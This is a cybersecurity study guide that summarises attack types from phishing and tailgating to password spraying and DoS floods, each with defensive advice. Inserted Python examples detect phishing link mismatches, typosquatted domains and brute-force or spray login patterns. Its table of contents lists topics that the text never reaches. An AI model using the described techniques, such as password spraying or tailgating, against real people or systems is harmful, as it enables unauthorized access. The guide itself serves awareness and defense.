
Philipp Bùi Đỗ

Summary of Cyber Attack Types

© roadmap.sh

Phishing..............................................................................................4
Vishing...............................................................................................4
Whaling..............................................................................................4
Smishing............................................................................................5
Spam.................................................................................................5
Spim..................................................................................................6
Shoulder Surfing..................................................................................7
Dumpster Diving..................................................................................8
Tailgating............................................................................................8
Zero Day...........................................................................................10
Social Engineering..............................................................................11
Reconnaissance..................................................................................12
Impersonation...................................................................................14
Watering Hole Attack..........................................................................15
Drive by Attack..................................................................................16
Typo Squatting...................................................................................17
Brute Force Attacks............................................................................19
Password Spray Attacks......................................................................19
DoS vs DDoS.....................................................................................20
MITM................................................................................................21
ARP Poisoning....................................................................................23
Evil Twin...........................................................................................24
DNS Poisoning...................................................................................25
Spoofing...........................................................................................27
Deauth Attack....................................................................................29
VLAN Hopping....................................................................................30
Rogue Access Point.............................................................................31
War-driving/dialing.............................................................................32
Buffer Overflow..................................................................................34
Memory Leak.....................................................................................35
XSS..................................................................................................37
SQL Injection.....................................................................................38
CSRF................................................................................................40
Replay Attack.....................................................................................41
Pass the Hash....................................................................................42
Directory Traversal.............................................................................44
Malware............................................................................................45

Phishing

Phishing is an attempt to obtain sensitive information, such as login
credentials or credit card details, by masquerading as a trustworthy entity.
This usually occurs via email. The attacker often creates an email that
appears to be from a reputable source, such as a bank, social media
platform, or even a known contact. The email may contain a link that directs
the victim to a fake website, where they are asked to enter their credentials
or other sensitive information.

How to protect yourself:

• Be cautious when opening emails from unknown senders
• Look for suspicious signs in the email, such as poor grammar or
inconsistencies in branding
• Always hover over links in emails to check the actual URL before
clicking
• Enable two-factor authentication (2FA) on your online accounts
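One way to automate the "hover over the link and check the actual URL" advice from the list above, as an added example that is not part of the original document: the script parses the anchors in an email body with Python's standard library and flags any link whose visible text names one domain while its href points to another. The email HTML is constructed sample input, and the registrable() helper uses a last-two-labels approximation rather than the public suffix list.

```python
"""Flag email links whose visible text shows one domain but whose href goes elsewhere."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Matches link text that looks like a URL or bare domain, e.g. "bank.example.com"
# or "https://support.bank.example.com/help"; group 1 is the host.
DOMAIN_LIKE = re.compile(
    r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[/:?#]\S*)?$", re.IGNORECASE
)


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None   # href of the <a> currently open, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(text):
    """Host named by the link text, or None when the text is not URL-like."""
    match = DOMAIN_LIKE.match(text.strip())
    return match.group(1).lower() if match else None


def registrable(host):
    """Last two labels of a host (simplification: real code would use the public suffix list)."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def suspicious_links(html):
    """Return (text, href) pairs where the displayed domain and the real target disagree."""
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for href, text in parser.links:
        shown = host_of(text)
        if shown is None:
            continue  # "Click here"-style text: nothing to compare against
        actual = urlparse(href).hostname
        # An unparseable href is treated as a mismatch rather than silently passed.
        if actual is None or registrable(actual.lower()) != registrable(shown):
            findings.append((text, href))
    return findings


# Constructed sample message: the first link displays one domain but leads to another.
SAMPLE_EMAIL = """
<p>Dear customer,</p>
<p>Please log in at <a href="http://login.bank.example.net/reset">bank.example.com</a>
to restore access.</p>
<p>Help: <a href="https://support.bank.example.com/">https://support.bank.example.com</a></p>
<p><a href="https://updates.example.org/">Click here</a> for details.</p>
"""

if __name__ == "__main__":
    for text, href in suspicious_links(SAMPLE_EMAIL):
        print(f"displayed {text!r} but links to {href!r}")
```

Links whose text is a plain phrase ("Click here") are skipped because there is nothing to compare; a mail gateway would typically combine this check with reputation data on the href host.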

Vishing
Vishing, or voice phishing, involves attackers using phone calls or voice
messages to persuade victims into revealing sensitive information, such as
banking details or passwords. Vishing attacks often rely on social
engineering tactics, tricking the target into believing they’re speaking with a
legitimate company representative or authority figure.

How to protect yourself:

• Be cautious when receiving unexpected phone calls, especially from
unknown numbers
• Verify the caller’s identity by asking for details only the legitimate
party would know
• Avoid providing personal information over the phone, unless you
initiated the call and trust the recipient
• If in doubt, hang up and call the known, verified number for the
company or institution the caller claimed to represent

Whaling
Whaling is a specific type of phishing attack that targets high-profile
individuals, such as executives, celebrities, or politicians. These attacks tend
to be more targeted and sophisticated, as the attacker has likely conducted
extensive research on the victim.

How to protect yourself:

• Be aware of the potential risks associated with a high-profile position
• Utilize strong, unique passwords for each of your accounts
• Train employees on phishing and whaling techniques to minimize the
likelihood of a successful attack
• Regularly conduct security audits to ensure your organization’s
security measures are up-to-date

Smishing
Smishing, or SMS phishing, is the act of using text messages to deceive
victims into revealing sensitive information or downloading malicious
software. The attacker may include a shortened URL or a phone number,
attempting to trick the victim into following the link or calling the number.

How to protect yourself:

• Be cautious when receiving unsolicited text messages, especially from
unknown senders
• Check the sender’s phone number to ensure it’s legitimate or
corresponds to the alleged source
• Never click on suspicious links included in text messages
• Install mobile security software to protect your device from potential
threats

By staying informed about these various attack types, you can better protect
yourself and your organization from falling victim to cyber threats. Remain
vigilant and ensure you have proper security measures in place to minimize
the risk of these attacks.

Spam
Spam refers to any unwanted, unsolicited, or irrelevant messaging sent over
the internet, usually to a large number of users, for the purposes of
advertising, phishing, or spreading malware. These messages are typically
sent via email, which is why they are often called “spam emails.” Spam may
contain malicious attachments or links that, when clicked, download malware
or lead users to compromised websites.

Spammers often use automated systems to send these messages to a large
number of recipients. Some common characteristics of spam emails include:

• Suspicious sender addresses
• Generic greeting
• Unusual or unexpected attachments or links
• Urgent or threatening language
• Requests for personal information

To protect yourself from spam, you should:

• Set up effective email filters
• Never share your email address publicly
• Avoid clicking on suspicious links or attachments
• Report spam to your email provider

Spim
Spim, or “spam over instant messaging,” is similar to spam but occurs over
instant messaging (IM) services, such as Facebook Messenger, WhatsApp,
and others. The main difference between spam and spim is the medium
through which the unwanted messages are sent. Just like spam, spim can be
used for advertising, spreading malware, or conducting phishing attacks.

Some common characteristics of spim messages include:

• Unknown or suspicious sender accounts
• Messages containing links or attachments
• Unsolicited promotions or offers
• Requests for personal information
• Unexpected urgency or threats

To protect yourself from spim, you should:

• Set your IM service’s privacy settings to limit who can message you
• Be cautious when clicking on links or attachments from unknown or
suspicious accounts
• Block or report spim accounts
• Keep your IM client software updated

Shoulder Surfing
Shoulder surfing is a type of social engineering attack where an attacker
observes someone’s screen, keyboard, or any other device to gain
unauthorized access to sensitive information. It is typically performed by
secretly watching the victim during data entry, either directly or indirectly
through reflections, smartphones, or other recording equipment.

How Shoulder Surfing Occurs

• Direct observation: An attacker stands close to the target and
observes their activities, such as typing passwords, entering credit
card details, or accessing confidential data.
• Using cameras: An attacker may use a hidden camera or a
smartphone to secretly record keystrokes, which can be analyzed later
to extract sensitive information.
• Seeing reflections: Attackers may view reflections on nearby
surfaces such as windows, shiny objects, or even the victim’s glasses
to monitor their activities.

Preventing Shoulder Surfing

To protect yourself from shoulder surfing, follow these guidelines:

• Be aware of your surroundings, especially in public places where the
risk of shoulder surfing is higher.
• Use privacy screens or screen guards to reduce the visibility of your
device from different angles.
• If using a smartphone or tablet, tilt the screen towards you and away
from potential observers.
• When entering sensitive information such as PIN codes or passwords,
shield your keyboard or keypad with your body or hand.
• Change passwords regularly and avoid using easy-to-guess or common
passwords.
• Educate employees about the risks of shoulder surfing and the
importance of maintaining confidentiality in the workplace.

By staying cautious and adopting these security measures, you can greatly
reduce the risk of shoulder surfing and protect your sensitive data from
unauthorized access.

Dumpster Diving
Dumpster diving is a low-tech but potentially effective method used by
attackers to gather sensitive and valuable information by physically
searching through an organization’s trash. Dumpster divers often target
discarded documents such as old memos, printouts, and reports that may
still contain sensitive information like usernames, passwords, credit card
numbers, and other confidential details.

How it works

Attackers search public and private trash receptacles to find information that
may be helpful in their attack strategy. By combining details from many
discarded documents, attackers may piece together a complete
understanding of the organization’s internal workings and gain access to
protected systems.

Countermeasures

• Implement a ‘shred-all’ policy: Ensure that all sensitive documents
are shredded before being discarded. Make it a standard company
policy, and ensure that all employees are trained in this practice.

• Raise awareness: Train employees to recognize the potential risks of
improper disposal and encourage them to be diligent in disposing of
sensitive documents.

• Secure disposal: Use lockable bins and trash bags or dispose of
sensitive documents in a designated, secured place where they will be
safely destroyed.

• Periodic audits: Conduct regular audits of your physical security
measures, including trash receptacles and disposal methods.

By implementing these countermeasures, your organization can significantly
reduce its risk of exposing sensitive information through dumpster diving.

Tailgating
Tailgating, also known as “piggybacking”, is a social engineering technique
used by attackers to gain unauthorized access to secure facilities or systems
by following closely behind a legitimate user. This attack exploits the human
tendency to trust others and help them out in various situations.

How it works

• Target identification: The attacker chooses a target building, office,
or data center which requires secure access.

• Observation: The attacker watches for patterns, studying employees’
routines and behaviors, identifying an ideal opportunity to slip in
unnoticed.

• Entry: The attacker waits for a situation where an employee is
entering the secure area using their access card, and pretends to have
forgotten their card or phone, or to be preoccupied. The attacker follows
the employee entering the area or even asks the employee to hold the
door open.

• Securing Access: Once inside, the attacker may even steal a physical
access card or exploit other vulnerabilities to secure long-term access.

Prevention Measures

• Awareness training: Ensure that employees are aware of tailgating
as a threat and the importance of adhering to security policies.

• Physical security: Implement security measures like turnstiles,
mantraps, or security guards to monitor and control access.

• Access control: Ensure that access cards are unique to each
employee and cannot be easily duplicated.

• Strict policies: Enforce strict policies regarding holding doors open for
others or allowing individuals into secure areas without proper
credentials.

• Security culture: Build a strong security culture where employees
feel responsible for the organization’s security and report any
suspicious behavior.

It is essential to keep in mind that tailgating relies heavily on human
behavior and trust. While physical and technical security measures are
crucial, fostering a culture of vigilance and employee awareness can be just
as effective in preventing such attacks.

Zero Day
A zero day attack is an exploit that takes advantage of an unknown
software vulnerability that has not been discovered, disclosed or patched by
the software’s developer. This type of attack, also known as an exploit, is
particularly dangerous because it exploits a security gap that the vendor is
not aware of, meaning there is no existing fix or protection against it.

Characteristics

There are certain characteristics that make zero day attacks particularly
dangerous, such as:

• Undetected vulnerability: Attackers target vulnerabilities in software
that developers or manufacturers are not aware of, making it difficult
for defenders to protect against the attack.

• Speed: Zero day attacks are quickly executed, often before any
security measures can be implemented, resulting in a higher success
rate for attackers.

• Stealth: Attackers usually exploit these vulnerabilities quietly, making
their intrusion hard to detect, and can maintain undetected access to a
network or system.

Consequences

Zero day attacks can have serious consequences, including:

• Data theft or loss
• Damaged systems or infrastructure
• Financial losses
• Reputation damage

Organizations should invest in proactive security measures to protect against
such attacks, as reactive measures alone may not be enough.

Mitigation Strategies

• Keep software up-to-date: Regularly update software and apps, as
developers often release patches and fixes for known vulnerabilities.

• Implement multi-layered security: Employ a combination of robust
security solutions, including firewalls, intrusion detection and
prevention systems, anti-malware software, and more.

• Monitor network and device activity: Regularly monitor and
analyze network and device activities to spot any unusual behavior,
potentially indicating an exploit.

• Encrypt sensitive data: By encrypting sensitive data, it becomes
harder for hackers to steal and misuse it.

• Segment networks: Segment your networks to limit access to
sensitive information and systems, minimizing the damage in case of a
breach.

• Educate employees: Provide training for employees about the threat
landscape, good security practices, and how to avoid falling victim to
phishing or social engineering attacks.

• Regular backups and disaster recovery planning: Routinely and
securely back up data and develop a disaster recovery plan to mitigate
damages from security breaches or attacks.

Social Engineering
Social engineering is a subtle yet highly effective method of manipulation
that plays on human emotions and behavior to gain unauthorized access to
sensitive information. It relies on psychological tactics, rather than technical
ones, to deceive people into providing confidential data, allowing
unauthorized access, or performing actions that compromise cybersecurity.

Types of Social Engineering

There are various forms of social engineering, including:

• Phishing: A widespread technique where attackers create fake emails
and websites, imitating legitimate organizations, to deceive victims
into sharing sensitive data such as login credentials or financial
information.

• Pretexting: This method involves the attacker fabricating a believable
scenario or pretext to establish trust with the target and trick them
into divulging sensitive information.

• Baiting: Tempting the victim with free or irresistible offers such as
software, downloads, or attractive discounts, with the intention of
installing malware or gaining unauthorized access.

• Quid pro quo: Offering a service, information, or assistance in
exchange for the victim’s sensitive information or system access.

• Tailgating/piggybacking: Attacker gains unauthorized physical
access to restricted areas by closely following an authorized individual
or posing as an employee or contractor.

Preventive Measures

To protect yourself and your organization against social engineering attacks,
keep the following tips in mind:

• Educate employees about the various social engineering methods,
signs of potential attacks, and best practices to avoid falling victim.

• Implement robust security protocols, including multi-factor
authentication, password policies, and restricted access to valuable
data.

• Encourage a culture of verification and validation to ensure the
authenticity of requests, emails, and communication.

• Keep software and security solutions up-to-date to minimize
vulnerabilities that can be exploited by attackers.

• Regularly back up data and have an incident response plan in place to
mitigate the impact of successful attacks.

Remember, social engineering preys on human psychology and behavior.
Therefore, awareness, vigilance, and adherence to best practices are crucial
to defend against such threats.

Reconnaissance
Reconnaissance is a crucial stage in any cyber attack and refers to the
process of gathering information about potential targets, their systems,
networks, and vulnerabilities. This information is used by attackers to select
which tactics, techniques, or tools will be most effective when attempting to
compromise a target system or organization. Reconnaissance can be divided
into two primary methods: active and passive.

Active Reconnaissance

In active reconnaissance, attackers directly engage with their target to
gather information. This may include scanning networks for open ports or
services, attempting to query servers or probing for vulnerabilities. Since the
attacker is actively interacting with target systems, there is a higher chance of
being detected by intrusion detection systems, firewalls or security teams.

Common active reconnaissance tools include:

• Nmap: A network scanner that can discover hosts, services, and open
ports.

• Nessus: A vulnerability assessment tool that allows attackers to scan
for known vulnerabilities in target systems.

Passive Reconnaissance

In passive reconnaissance, the attacker seeks to gather information about
the target without making any contact or directly engaging with target
systems. Passive reconnaissance is often harder to detect and involves
activities such as social engineering, open-source intelligence (OSINT)
gathering, or analyzing leaked data.

Common passive reconnaissance techniques include:

• Searching public forums, social media profiles, or websites for
information about an organization or its employees.

• Using search engines to find exposed or inadvertently leaked data.

• Sifting through DNS records and WHOIS information to discover
subdomains and email addresses that might be used in further attacks.

Defensive measures against reconnaissance include monitoring network
traffic for unusual patterns or repeated probing attempts, regularly updating
and patching systems, providing employee training on social engineering
awareness, and implementing network segmentation to limit access to
sensitive information.

Impersonation
Impersonation is a type of cyber attack where an attacker pretends to be a
legitimate user, system, or device to gain unauthorized access or manipulate
their target. This kind of attack can happen through various channels like
email, phone calls, social media, or instant messaging platforms.
Impersonation attacks mainly aim to deceive the target into providing
sensitive information, executing malicious actions, or gaining unauthorized
access to secure systems.

Types of Impersonation Attacks

• Phishing: Attackers send emails appearing to be from legitimate
sources, tricking the target into revealing sensitive information or
downloading malware.

• Spear phishing: A more targeted form of phishing, where the
attacker possesses specific information about their target and creates
a personalized email.

• Whaling: This attack targets high-ranking individuals like CEOs or
CFOs, using a combination of personalized spear-phishing and social
engineering to extract valuable information or conduct fraudulent
transactions.

• Caller ID spoofing: Attackers manipulate phone numbers to appear
as if they’re coming from a legitimate source, often impersonating
customer support agents or bank representatives to deceive targets
into providing sensitive information.

• Man-in-the-middle (MITM) attacks: Attackers insert themselves
between the target user and a website or service, impersonating both
ends of the communication to intercept sensitive data.

• Social media impersonation: Attackers create fake profiles that
resemble trusted individuals or organizations in order to deceive their
targets, gain information, or spread misinformation.

Ways to Prevent Impersonation Attacks

• Enable multi-factor authentication (MFA): By requiring two or
more forms of identity verification, you can reduce the risk of
unauthorized access.

• Educate users: Teach users about the risks of impersonation attacks
and how to recognize potential red flags.

• Implement strong password policies: Encourage users to create
unique, complex passwords and change them regularly.

• Keep software up-to-date: Regularly update and patch all software,
including operating systems and applications, to protect against known
vulnerabilities.

• Use encryption: Protect sensitive data by using encryption both in
transit and at rest.

• Monitor and analyze network traffic: Regularly review network
logs and use tools to detect and analyze anomalies or signs of
potential impersonation attacks.

By understanding the various types of impersonation attacks and
implementing these security best practices, you can better defend your
organization against these ever-evolving cyber threats.

Watering Hole Attack
A watering hole attack is a targeted cyber attack in which an attacker
observes the websites frequently visited by a specific group or organization
and seeks to compromise those sites in order to infect their desired targets.
These attacks are named after the predator-prey relationship in nature, much
like how predators wait near a watering hole to hunt their prey.

In this type of attack, the attacker does not directly target the victims;
instead, they focus on the websites that the targeted users commonly visit.
Here’s a step-by-step breakdown of a typical watering hole attack:

• Identify Target: The attacker identifies a specific organization or
group they want to target, like a government agency or a corporation.

• Study Behavior: The attacker studies the internet browsing behavior
of the target users, observing which websites they frequently visit.

• Compromise Website: The attacker exploits vulnerabilities in one or
more of the target websites and injects malicious code into them. This
could be through a vulnerable plugin, weak passwords, or even by
gaining access to the site’s hosting platform.

• Infect Victims: When the target users visit the compromised
websites, they unknowingly download the malicious code onto their
machines, allowing the attacker to further exploit the infected devices.

Detection and Prevention

To protect against watering hole attacks, it is important to adopt best
practices, including:

• Regularly updating software on both servers and user devices.

• Installing robust security plugins for websites.

• Adopting a strong password policy and using multi-factor
authentication.

• Conducting cybersecurity awareness training to educate your
employees.

• Implementing network and endpoint security solutions to detect and
prevent intrusions.

In conclusion, a watering hole attack is a subtle yet dangerous vector for
cybercriminals to infiltrate their targets’ systems. Organizations should
prioritize cybersecurity hygiene and user education to minimize the risks
posed by these attacks.

Drive by Attack
A Drive-by Attack is a common cyber security threat where an attacker
aims to infect a user’s computer or device by exploiting vulnerabilities in
their web browser or its plugins. Typically, users unknowingly fall victim to
drive-by attacks when they visit a malicious or compromised website, which
in turn automatically executes the malicious code.

How Drive-By Attacks Work

• Exploiting web vulnerabilities: Attackers often target popular
websites with security flaws or vulnerabilities, which can be exploited
to inject malicious code.

• Malvertisements: Another common method for drive-by attacks is
through online advertising. Cybercriminals use advertising networks to
circulate infected ads that, once clicked, execute the malicious code on
the user’s device.

• Social Engineering: Attackers use social engineering tactics to trick
users into visiting compromised websites that exploit browser
vulnerabilities.

Preventing Drive-By Attacks

To safeguard against drive-by attacks, consider the following measures:

• Keep your software up-to-date: Regularly update your web
browser, plugins, and operating system to defend against known
vulnerabilities.

• Use reputable antivirus software: Employ a trusted antivirus
solution with real-time scanning and frequent signature updates to
detect and remove malware.

• Enable click-to-play for plugins: Adjust your browser settings to
require manual activation of plugins, like Adobe Flash, which can be
exploited by attackers.

• Practice good browsing habits: Avoid visiting suspicious websites,
opening unknown email attachments, and clicking on unverified links
from sources you do not trust.

• Disable JavaScript and browser plugins when not needed:
Disabling browser features, like JavaScript and browser plugins, can
reduce the chances of a drive-by attack.

• Implement web filtering: Utilize content filtering or secure web
gateways to block access to malicious websites.

By understanding the methods and tactics used in drive-by attacks and
following these preventative measures, you can better protect yourself and
maintain a secure online presence.

Typo Squatting
Typo Squatting, also known as URL hijacking or domain squatting, is a
malicious cyber-attack technique that targets internet users who mistakenly
enter an incorrect website address into their web browsers. When this
occurs, the users are directed to a fake website that closely resembles a
legitimate one. The attackers create these fake websites by registering
domain names similar to the target website, but with common typographical
errors. The goal of typo squatting is often to spread malware, steal personal
information or financial details, sell counterfeit products, or promote
phishing scams.

How Typo Squatting Works

• Domain Registration: Attackers register domain names that are
similar to popular websites, but with slight typos, such as missing or
swapped characters. For example, if the intended website is
example.com, the attacker may register exapmle.com or exampl.com.

• Creating Fake Websites: Attackers create a website that visually
resembles the targeted website. This can include using the same
logos, images, and layout, making it difficult for users to distinguish
the fake site from the real one.

• Luring Victims: Unsuspecting users who make typographical errors
while typing the URL are redirected to the fake website, where they
may unknowingly provide their personal or financial information,
download malware, or fall victim to phishing scams.

• Exploitation: Attackers may use the gathered information for identity
theft, financial fraud, or sell the data on the dark web. They may also
use the malware-infected devices to create botnets or perform further
attacks on other targets.
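An added example (not part of the original document) of the browser-side protection the steps above call for: given an allowlist of domains you trust, it classifies the host a user is about to visit as trusted, a lookalike of a trusted domain, or simply unknown. It uses the optimal string alignment distance, so a single swap like exapmle.com or a dropped letter like exampl.com is caught, and folds common look-alike character sequences (rn for m, 1 for l, 0 for o) before comparing. The domain names are constructed, and the threshold of one edit is an assumption to tune per allowlist; sibling domains that legitimately differ by one character need their own allowlist entry.

```python
"""Classify a host as trusted, a typo/homoglyph lookalike of a trusted domain, or unknown."""

# Character sequences that read like another letter in many fonts; both sides of
# the comparison are folded the same way so only genuine differences remain.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def osa_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions,
    and a swap of two adjacent characters each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # delete a[i-1]
                          d[i][j - 1] + 1,          # insert b[j-1]
                          d[i - 1][j - 1] + cost)   # substitute
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # adjacent swap
    return d[len(a)][len(b)]


def canonical(host):
    """Lowercase, drop a trailing dot and a leading 'www.' so those never count as edits."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def fold_confusables(host):
    """Replace look-alike sequences so a homoglyph domain lands on its target."""
    for fake, real in CONFUSABLES:
        host = host.replace(fake, real)
    return host


def classify(host, trusted, max_distance=1):
    """Return ("trusted", name), ("lookalike", name) or ("unknown", None).

    An exact match wins. Otherwise the closest trusted domain within max_distance
    edits (after folding confusables) is reported as the impersonated domain."""
    raw = canonical(host)
    best = None
    for name in trusted:
        target = canonical(name)
        if raw == target:
            return ("trusted", name)
        dist = osa_distance(fold_confusables(raw), fold_confusables(target))
        if dist <= max_distance and (best is None or dist < best[0]):
            best = (dist, name)
    return ("lookalike", best[1]) if best else ("unknown", None)


# Constructed allowlist; in practice this comes from the organisation's own domains.
TRUSTED = ["example.com", "mail.example"]

if __name__ == "__main__":
    for host in ["www.example.com", "exapmle.com", "exampl.com", "examp1e.com",
                 "rnail.example", "unrelated.example.org"]:
        print(host, "->", classify(host, TRUSTED))
```

A "lookalike" verdict is the signal to warn the user or block the navigation; "unknown" only means the host is not close to anything on the allowlist, not that it is safe.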

Prevention and Mitigation

• Double-check URLs: Always double-check the URL you type into your
browser to ensure you are accessing the intended website.

• Use Bookmarks: Bookmark frequently visited websites to avoid
typing the URL manually every time.

• Search Engines: If unsure about the correct URL, use search engines
to locate the desired website.

• Use Security Software: Install and maintain up-to-date security
software on your devices, such as anti-virus, anti-phishing, and
anti-malware tools, to protect against potential threats from typo
squatting.

• Enable Browser Protection: Many web browsers offer built-in
security features that help identify and block malicious websites.
Ensure these features are enabled and configured correctly.

In conclusion, while typo squatting presents a significant risk to internet
users, awareness and vigilance can significantly reduce the chances of
becoming a victim. Always verify that you’re visiting the correct website
before entering any personal or sensitive information.

Brute Force Attacks
Brute Force attacks are a trial-and-error method used by attackers to
discover the correct credential combinations (username and password) to
gain unauthorized access to an account or system. This is done by
systematically trying as many possibilities as possible until the correct
combination is found.

In a Brute Force attack, the attacker usually utilizes automated tools to
generate and test numerous password combinations. This strategy can be
time-consuming, resource-intensive, and potentially detectable due to the
massive number of login attempts made in a short period.

Protecting Against Brute Force Attacks

To mitigate the risks of a Brute Force attack, implement the following best
practices:

• Strong password policies: Require long, unique passwords and check
new passwords against lists of breached or commonly used passwords;
length and uniqueness matter more than forced character classes.

• Account lockout and rate limiting: Temporarily lock an account, or
slow down responses, after a set number of unsuccessful login attempts
from the same account or source. Keep the lockout short enough that an
attacker cannot use it to lock legitimate users out on purpose.

• Multi-factor authentication (MFA): Implement MFA so that a guessed
password alone is not enough to gain access.

Password Spray Attacks


Password Spray attacks take a different approach to compromising
accounts. Instead of attempting many passwords against one account, as in
a Brute Force attack, the attacker tries a single (often commonly used)
password against many accounts, then moves on to the next password. This
keeps the number of failures per account low, so the attempts stay under
typical account lockout thresholds and blend in with ordinary mistyped
logins.

In a Password Spray attack, the attacker typically uses a list of known or
harvested usernames and tries a small set of commonly used passwords
(for example a season and year, or the company name followed by a digit)
against each username. As many individuals still use weak and common
passwords, this attack type can be surprisingly effective.

Protecting Against Password Spray Attacks

To defend against Password Spray attacks, follow these best practices:

• Educate users on password choice: Teach users to choose strong,
unique passwords, and block the common passwords that sprays rely on
at the point of creation.

• Monitor for unusual login patterns: Because a spray produces only one
or two failures per account, per-account lockout rules will not catch it.
Correlate across accounts instead: alert on one source address or
user-agent producing failed logins against many different usernames in a
short window, or on a single password being tried against many accounts.

• Implement multi-factor authentication (MFA): Require an additional
authentication factor so that a guessed password alone does not grant
access.
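The two attack shapes described in the Brute Force and Password Spray sections above leave different traces in an authentication log, and a detector has to look for both: many failures against one account from one source, and a few failures each against many accounts from one source. The following is an added example, not code from the original guide; the log format, thresholds and the sample log lines are constructed assumptions.

```python
"""Classify failed-login activity as brute force or password spraying.

Added example, not from the original guide. Log format, thresholds and the
sample lines are assumptions constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_log():
    """Constructed auth log (not real data): '<ISO time> <src_ip> <user> <result>'.
    One brute-force source, one spraying source, and one user who mistyped twice."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    for i in range(12):                                   # brute force: 12 failures, 1 account
        lines.append(f"{(t0 + timedelta(seconds=i)).isoformat()} 198.51.100.7 alice FAIL")
    users = ["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi"]
    for i, user in enumerate(users):                      # spray: 1 failure each, 8 accounts
        ts = (t0 + timedelta(minutes=5, seconds=i)).isoformat()
        lines.append(f"{ts} 203.0.113.9 {user} FAIL")
    lines.append(f"{(t0 + timedelta(minutes=7)).isoformat()} 192.0.2.5 dave FAIL")
    lines.append(f"{(t0 + timedelta(minutes=7, seconds=5)).isoformat()} 192.0.2.5 dave FAIL")
    lines.append(f"{(t0 + timedelta(minutes=7, seconds=9)).isoformat()} 192.0.2.5 dave OK")
    return "\n".join(lines)


SAMPLE_LOG = build_sample_log()


def parse_log(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, ip, user, result = line.split()
            events.append((datetime.fromisoformat(ts), ip, user, result))
    return events


def detect(events, window=timedelta(minutes=10), brute_threshold=10,
           spray_min_accounts=5, spray_max_per_account=2):
    """Return {'brute_force': [(ip, user, failures)], 'password_spray': [(ip, accounts)]}.
    Brute force: one (source, account) pair exceeds brute_threshold failures in `window`.
    Spray: one source fails against >= spray_min_accounts distinct accounts inside
    `window` while never exceeding spray_max_per_account failures on any of them."""
    failures = defaultdict(list)                          # (ip, user) -> timestamps
    for ts, ip, user, result in events:
        if result == "FAIL":
            failures[(ip, user)].append(ts)
    brute, per_source = [], defaultdict(dict)
    for (ip, user), stamps in failures.items():
        stamps.sort()
        if len(stamps) >= brute_threshold and stamps[-1] - stamps[0] <= window:
            brute.append((ip, user, len(stamps)))
        per_source[ip][user] = stamps
    spray = []
    for ip, users in per_source.items():
        all_stamps = sorted(t for s in users.values() for t in s)
        if (len(users) >= spray_min_accounts
                and max(len(s) for s in users.values()) <= spray_max_per_account
                and all_stamps[-1] - all_stamps[0] <= window):
            spray.append((ip, len(users)))
    return {"brute_force": sorted(brute), "password_spray": sorted(spray)}


if __name__ == "__main__":
    print(detect(parse_log(SAMPLE_LOG)))
```

Note that the spraying source never trips a per-account threshold (one failure per user), which is exactly why the detection has to pivot on the source rather than on the account; in a real deployment the source key would also include the user-agent or ASN, since sprays are often spread over many IP addresses.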

DoS vs DDoS
In this section, we will discuss the differences between DoS (Denial of
Service) and DDoS (Distributed Denial of Service) attacks, two common
network-based attacks that can severely impact the availability and
performance of targeted systems.

DoS (Denial of Service) Attack

A DoS attack is a type of cyber attack in which an attacker aims to make a
computer or network resource unavailable to its intended users, typically
by overwhelming the target with more requests or traffic than it can
handle, so that the service becomes inaccessible.

Some common methods employed in DoS attacks include:

• Flooding: The attacker sends a massive number of requests or packets
to the target system, exhausting its bandwidth, connection tables, or
processing capacity so that legitimate requests are dropped or the
system crashes.

• Ping of Death: The attacker sends an oversized or malformed ICMP
packet (sent in fragments that reassemble to more than the maximum
packet size of 65,535 bytes) to a system whose network stack does not
handle it correctly, causing it to crash. Modern operating systems are
patched against this, but the name persists for this class of attack.

DDoS (Distributed Denial of Service) Attack

A DDoS attack is similar to a DoS attack in its intent, but it utilizes multiple
computers or devices (usually compromised by malware) to launch the
attack. These devices, collectively called a “botnet”, send an overwhelming
amount of requests to the target system, making it even harder to mitigate
the attack and protect the resources.

Some common methods employed in DDoS attacks include:

• UDP Flood: The botnet sends a high volume of User Datagram Protocol
(UDP) packets to random ports on the target, which must check for a
listening application and reply with ICMP “destination unreachable”
messages; this exhausts the target’s bandwidth and processing capacity
until it can no longer serve legitimate traffic.

• HTTP Flood: The botnet generates a large number of seemingly
legitimate HTTP requests to the target server, exceeding its processing
capacity and causing a slowdown or outage. Because each request looks
like normal browsing, this is harder to filter than a packet flood.

Key Differences

• Scale: While DoS attacks are limited by the resources of a single
attacker, DDoS attacks involve multiple attacking devices, making
them more effective at overwhelming and disrupting the target
system.

• Mitigation: DoS attacks can usually be mitigated with simpler
countermeasures, but DDoS attacks often require more sophisticated
defense strategies due to their distributed and coordinated nature.

In conclusion, both DoS and DDoS attacks aim to disrupt the availability of a
target system by overwhelming its resources. However, their key differences
lie in the scale and complexity of the attack, with DDoS attacks being more
powerful and more challenging to defend against. It is crucial for
organizations to implement robust security measures to detect and mitigate
these attacks to maintain the availability and integrity of their systems.
